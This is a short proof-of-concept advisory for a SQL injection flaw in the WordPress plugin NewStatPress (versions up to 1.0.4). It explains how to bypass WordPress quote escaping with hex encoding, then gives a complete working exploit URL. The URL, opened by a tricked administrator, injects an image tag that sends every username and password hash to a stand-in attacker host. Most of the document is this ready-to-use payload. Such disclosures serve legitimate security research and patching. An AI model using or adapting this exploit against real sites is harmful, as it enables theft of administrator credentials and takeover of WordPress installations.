NewStatPress <= 1.0.4 - SQL Injection

The following URL will trigger an SQLI attack, which in turn injects an element into the page, which allows for transmission of the retrieved user hashes to an attacker-controlled URL. In the PoC below, it will output an IMG element pointing to http://attacker/?creds=CREDS, where CREDS is replaced with a concatenated list of usernames and password hashes.

As the strings in the call are encoded with the MySQL function ‘hex’, there is no need to use any quotes. This is to bypass the quote escaping implemented by WordPress. Should an Administrative user be tricked into visiting the URL, all of the usernames and password hashes will be transmitted (so long as there are no restrictive CSP headers implemented).

http://localhost/wp-admin/admin.php?where1=ip&what1=0&where2=spider+%3D+0+UNION+SELECT+CONCAT%280x3C696D67207372633D22687474703A2F2F61747461636B65722F3F63726564733D%2C%28select+hex%28group_concat%28concat_ws%28char%2858%29%2Cwp_users.user_login%2Cwp_users.user_pass%29%29%29+from+wp_users+group+by+1%3D1%29%2C0x223e%29--&what2=0&searchsubmit=Search&page=nsp_search&newstatpress_action=search